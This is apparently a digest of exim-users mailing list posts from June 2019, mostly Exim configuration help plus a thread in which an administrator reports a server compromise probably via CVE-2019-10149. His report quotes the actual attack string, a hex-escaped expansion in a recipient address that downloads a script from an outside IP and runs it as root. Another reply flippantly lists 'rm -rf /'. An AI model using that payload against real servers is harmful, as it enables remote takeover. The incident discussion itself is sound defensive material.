Re: [exim] just been hacked, could be CVE-2019-10149?

[Calum Mackay via Exim-users]

Thanks Marius,

Yes indeed, no argument at all. I've been involved in UNIX security for 
30 years (and so should have known better anyway).


Luckily, in this case, the script-kiddies efforts seem naive, and they 
weren't even able to succeed in opening up SSH access, despite having 
root and attempting it.


They made some effort to change mtimes of files changed, but forgot, or 
weren't able, to also change inode ctimes, so those were, at least, 
easily found.


It's not likely all that was a charade, hiding some more sophisticated 
hacking but, as you say, it's impossible to be sure.


good points!

cheers,
calum.

On 19/06/2019 6:50 pm, Cyborg via Exim-users wrote:

Am 11.06.19 um 19:34 schrieb Calum Mackay via Exim-users:

I'm still catching up, but…

On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:

Why didn't you harden your exim with the "allowed chars" change we
posted here on the list, or did you?


Is that still necessary/advised, now I'm running 4.92?



rm -rf /
reboot from usb drive
reinstall modern ShortCycle OSes like Fedora

Why?

Because your server got hacked with root access and you have no idea
what the attacker did, what you did not find.
Attackers can change your logfiles to remove or correct theire
activities as they like, install Hypervisor Rootkits etc. etc.

Trust a it forensics guys, you can only be sure if you cold start the
server and boot from a trustworthy medium
to forensic a system.


best regards,
Marius






--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] just been hacked, could be CVE-2019-10149?

[Calum Mackay via Exim-users]

thanks Heiko, yes, good point re unstable.

In this case, the fix /was/ available in unstable, but a few other 
issues with updating had led to a delay, on that system, which proved 
unfortunate.


thanks,
calum.

On 19/06/2019 12:47 pm, Heiko Schlittermann via Exim-users wrote:

Calum Mackay via Exim-users  (Di 11 Jun 2019 01:39:22 
CEST):

My mail system has just been hacked; it's running Debian unstable exim
4.91-9


I just checked https://packages.debian.org/unstable/mail/, and they list
4.92-8 there. So your 4.91 seems to be outdated a bit.

But generally speaking, I wouldn't not rely on the same speed in fixing
critical issues for unstable releases than I'd expect for stable
releases. So, running an unstable release you're somewhat on your own.


Could it be CVE-2019-10149? I don't see any reports of active exploits yet.


Yes, it could be.


ought I to be reporting this anywhere?


Not sure. The issue is wellknown meanwhile. And some distros already
supplied fixed packages or stated that they run very outdated (<4.87)
Exim versions and are not vulnerable for this reason.

 Best regards from Dresden/Germany
 Viele Grüße aus Dresden
 Heiko Schlittermann
--
  SCHLITTERMANN.de  internet & unix support -
  Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
  gnupg encrypted messages are welcome --- key ID: F69376CE -
  ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -




--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] just been hacked, could be CVE-2019-10149?

[Calum Mackay via Exim-users]

Interesting point, thanks Jan.

No external users/customers on this system, fortunately. If there were, 
or it had anything sensitive anywhere near it, I'd not have been running 
unstable on it, and it would have been updated much more frequently.


thanks,
calum.


On 19/06/2019 3:18 pm, Jan Ingvoldstad via Exim-users wrote:

On Wed, Jun 19, 2019 at 1:26 PM Calum Mackay via Exim-users <
exim-users@exim.org> wrote:



Luckily, it looks like the trojans did nothing more than repeated
attempts to open up my ssh server to root logins, which I think (and
hope) didn't actually work, so I may have been lucky, and the damage
isn't widespread.


ought I to be reporting this anywhere?



As this puts the metadata and content of emails transmitted through your
server at risk, as well as any authenticated user/customer login details
(passwords, too), if you are operating within the EEA, you are bound by the
GDPR and probably have a duty to alert any affected and potentially
affected users/customers about the breach and what kind of data is astray,
etc.



--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] exim and utf8

[Randy Bush via Exim-users]

and the answer is 

smtputf8_advertise_hosts =

randy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] just been hacked, could be CVE-2019-10149?

[Cyborg via Exim-users]

Am 11.06.19 um 19:34 schrieb Calum Mackay via Exim-users:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised, now I'm running 4.92?


rm -rf /
reboot from usb drive
reinstall modern ShortCycle OSes like Fedora

Why?

Because your server got hacked with root access and you have no idea
what the attacker did, what you did not find.
Attackers can change your logfiles to remove or correct theire
activities as they like, install Hypervisor Rootkits etc. etc.

Trust a it forensics guys, you can only be sure if you cold start the
server and boot from a trustworthy medium
to forensic a system.


best regards,
Marius




-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] just been hacked, could be CVE-2019-10149?

[Jan Ingvoldstad via Exim-users]

On Wed, Jun 19, 2019 at 1:26 PM Calum Mackay via Exim-users <
exim-users@exim.org> wrote:


> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>
>
As this puts the metadata and content of emails transmitted through your
server at risk, as well as any authenticated user/customer login details
(passwords, too), if you are operating within the EEA, you are bound by the
GDPR and probably have a duty to alert any affected and potentially
affected users/customers about the breach and what kind of data is astray,
etc.
-- 
Jan
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

[Heiko Schlittermann via Exim-users]

Russell King via Exim-users  (Di 11 Jun 2019 16:08:28 
CEST):
>
> As I stated in my original post, I've tried subsituting the " " with
> both + and %2b.  I was using Firefox, I've also used elinks as well.
> Nothing works to get a commitdiff.
>
> >https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91%2Bfixes
>
> That URL is not a problem - getting the shortlog is not a problem.
> Following any of the links from the shortlog _is_ a problem as my
> original post stated.

Hm. Starting with the link you describe here (using %2B) an can follow
many, if not all (didn't test *all*) links, shortlog -> commitdiff
works.

Using Chromium.
--
Heiko


signature.asc
Description: PGP signature
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] Auto-bcc certain outgoing mail?

[Dmitriy Matrosov via Exim-users]

On June 14, 2019 10:07:40 PM GMT+03:00, Aki Kyo via Exim-users 
 wrote:
>Hello, can someone help guide me what the best way is to grab copies
>of one of our users outgoing mails and bcc to another address?
>
>Thank you

Probably, you may use imap/pop3 server for sharing access to mailbox instead of 
doing bcc. Like https://wiki.dovecot.org/SharedMailboxes .
Shared mailboxes may have separate "read" flag and sharing may be done 
invisible to main user.

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] Unix domain socket for redis_servers

[Jeremy Harris via Exim-users]

On 12/06/2019 19:32, Yevgeny Kosarzhevsky via Exim-users wrote:
> could someone enlighten me what is the proper syntax for redis_servers
> to use unix domain socket?

http://exim.org/exim-html-current/doc/html/spec_html/ch-file_and_database_lookups.html
 :-

 If specified, the option must be set to a colon-separated list of
 server information. Each item in the list is a slash-separated list of
 three items: host, database number, and password.

The host is required and may be either an IPv4 address and optional
port number (separated by a colon, which needs doubling due to the
higher-level list), or a Unix socket pathname enclosed in
parentheses


-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] Blackhole messages from pre-defined domains

[Jeremy Harris via Exim-users]

On 11/06/2019 16:17, J Group via Exim-users wrote:
> However, when I did this, the rules stopped working and messages from blocked 
> domains were allowed through.

Test using -bh -d+all mode.  Where is the decision point where it takes
a wrong path?

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] just been hacked, could be CVE-2019-10149?

[Heiko Schlittermann via Exim-users]

Calum Mackay via Exim-users  (Di 11 Jun 2019 01:39:22 
CEST):
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9

I just checked https://packages.debian.org/unstable/mail/, and they list
4.92-8 there. So your 4.91 seems to be outdated a bit.

But generally speaking, I wouldn't not rely on the same speed in fixing
critical issues for unstable releases than I'd expect for stable
releases. So, running an unstable release you're somewhat on your own.

> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.

Yes, it could be.
>
> ought I to be reporting this anywhere?

Not sure. The issue is wellknown meanwhile. And some distros already
supplied fixed packages or stated that they run very outdated (<4.87)
Exim versions and are not vulnerable for this reason.

Best regards from Dresden/Germany
Viele Grüße aus Dresden
Heiko Schlittermann
--
 SCHLITTERMANN.de  internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -


signature.asc
Description: PGP signature
-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] Auto-bcc certain outgoing mail?

[Kathy Sechrist via Exim-users]

I accomplished this (ymmv) by creating a new file with the following, 
and saving it to


/usr/local/cpanel/etc/exim/sysfilter/options


# Exim filter
if first_delivery
and ("$sender_address:" contains "us...@example.com")
and not ("$h_X-Spam-Checker-Version:" begins "SpamAssassin")
then
unseen deliver "us...@example.com"
endif

I then enabled this filter through WHM > Exim Configuration Manager > 
Filters


(FYI I tried several versions of this file before landing on this one 
that works well. YMMV.)


Be warned - the additional recipient will receive a copy of the outgoing 
email with no changes, so it will appear as if it had been sent directly 
to them unless they look at the TO field. I suggest copying the emails 
to a separate account set up explicitly for the purpose of receiving 
copies to prevent unintentional replies/read receipts to the copied mail.



On 6/14/2019 2:07 PM, Aki Kyo wrote:

Hello, can someone help guide me what the best way is to grab copies
of one of our users outgoing mails and bcc to another address?

Thank you



--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

[exim] Exim Exploit CVE-2019-10149

[Gordon Dickens via Exim-users]

Hello Everybody,

Please be aware of Exim Exploit CVE-2019-10149.

https://www.zdnet.com/article/exim-email-servers-are-now-under-attack/

Everyone should update to Exim version 4.92 ASAP or whatever version of 
your OS which includes the fix for CVE-2019-10149.


For example, for Debian the fix is included in exim4 version 4.89-2+deb9u4.

FYI,

Gordon


--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] DKIM signing table

[Bjoern Franke via Exim-users]

Hi Jasen,

> 
> or you could just put the selector in another file.
> something like
> 
> dkim_selector=${if 
> exist{DKIM_DOMAIN.sel}{${readfile{DKIM_DOMAIN.sel}}}{default_selector}}

Great, thanks for the hint.

Best regards
Bjoern


-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

[exim] just been hacked, could be CVE-2019-10149?

[Calum Mackay via Exim-users]

hi all,

My mail system has just been hacked; it's running Debian unstable exim 
4.91-9


Could it be CVE-2019-10149? I don't see any reports of active exploits yet.

The reasons I suspect exim involvement:

• starting today, every 5 mins getting frozen messages:

The following address(es) have yet to be delivered:

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx: 
Too many "Received" headers - suspected mail loop


• the trojan horse scripts, that were successfully installed on my 
system, with root access, are all group Debian-exim



Luckily, it looks like the trojans did nothing more than repeated 
attempts to open up my ssh server to root logins, which I think (and 
hope) didn't actually work, so I may have been lucky, and the damage 
isn't widespread.



ought I to be reporting this anywhere?


thanks,
calum.

--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

[exim] Unix domain socket for redis_servers

[Yevgeny Kosarzhevsky via Exim-users]

Hello,

could someone enlighten me what is the proper syntax for redis_servers
to use unix domain socket?
Thanks!

-- 
Regards,
Yevgeny

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

[exim] Blackhole messages from pre-defined domains

[J Group via Exim-users]

Hello everyone,

I was hoping someone might be able to help me with this one. I have followed 
this guide on setting up a list of blocked domains on our WHM system: 
https://www.hostingmatters.co.uk/support/help-guides/86-server-management 


Ideally I would like to blackhole the messages rather than send a reply stating 
that the sender’s address is blocked. To do this, I changed the code from:
# Inserted to block domains access
# Local from blacklist: /etc/eximblacklist
reject_domains:
driver = redirect
# RBL Blacklist incoming hosts
domains = +eximblacklist
allow_fail
data = :fail: Connection rejected: $domain is manually blacklisted.

To this code:

# Inserted to block domains access
# Local from blacklist: /etc/eximblacklist
reject_domains:
driver = redirect
# RBL Blacklist incoming hosts
domains = +eximblacklist
allow_fail
data = :blackhole:

However, when I did this, the rules stopped working and messages from blocked 
domains were allowed through.

Can someone help me modify the code so that instead of a sender receiving a 
return message, their messages are just blackholed instead?

Kind regards


James

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

[Russell King via Exim-users]

On Tue, Jun 11, 2019 at 03:42:09PM +0200, Heiko Schlittermann via Exim-users 
wrote:
> Hi,
> 
> Russell King  (Di 11 Jun 2019 15:33:47 CEST):
> > Hi,
> >
> > While looking for the fix on the web version of git.exim.org, I find that
> > although I can get a listing based on the branch, I'm unable to get commit
> > or commitdiffs.
> >
> > For example, the page at:
> >
> >   https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91+fixes
> >
> > gives links such as:
> >
> > commit 
> > | commitdiff
> 
> The behaviour you describe seems to depend on the browser. FF is
> reported to work, while Chromium doesn't. Probably this varies with the
> versions.

I think you've misunderstood my email.  Please look carefully at those
links I've quoted...

> If in the above URL you substitute + by %2B, it works. I'm not sure if
> this is gitweb's fault. But gitweb could easily avoid this issue by not
> using unescaped plus signs.

As I stated in my original post, I've tried subsituting the " " with
both + and %2b.  I was using Firefox, I've also used elinks as well.
Nothing works to get a commitdiff.

>https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91%2Bfixes

That URL is not a problem - getting the shortlog is not a problem.
Following any of the links from the shortlog _is_ a problem as my
original post stated.

-- 
Russell King

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] exim and utf8

[Jeremy Harris via Exim-users]

On 19/06/2019 00:40, Randy Bush via Exim-users wrote:
> did the fix for the recent vuln possibly cause this?
> 
> this is exim forwarding to exim
> Exim version 4.92 #4 (FreeBSD 11.2) built 25-May-2019 01:19:44
> to
> Exim version 4.90_1 #4 built 04-Jun-2019 18:44:51
> 
> any thing i can do to ameliorate?  
> 
> randy
> 
> 2019-06-18 22:54:35 1hdMzr-000ESq-8e <= 
> bounce+e0fe98.5e6ef-randy=psg@notify.docker.com 
> H=(mail-182-80.mailgun.info) [23.253.182.80] P=utf8esmtps 
> X=TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128 CV=no S=4623 DKIM=notify.docker.com 
> id=20190618225434.73328.89257@7bfeb10228df
> 2019-06-18 23:02:58 1hdMzr-000ESq-8e H=test.psg.com [2001:418:8006::18]: utf8 
> support required but not offered for forwarding

Possibly indirectly, if the newer build included utf8 support and the
older did not.

You could:

- ask the sender if they really needed to use SMTPUTF8, and persuade
them not it if/when it is not needed by the message (actually, looking
at the env-from there, it probably was)
- ask the system you're forwarding to to update to add international
character support
- discover that you shouldn't really have been forwarding that message,
and close an open relay
- investigate the message and discover it was spam anyway
- configure to disable support for international characters on reception

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/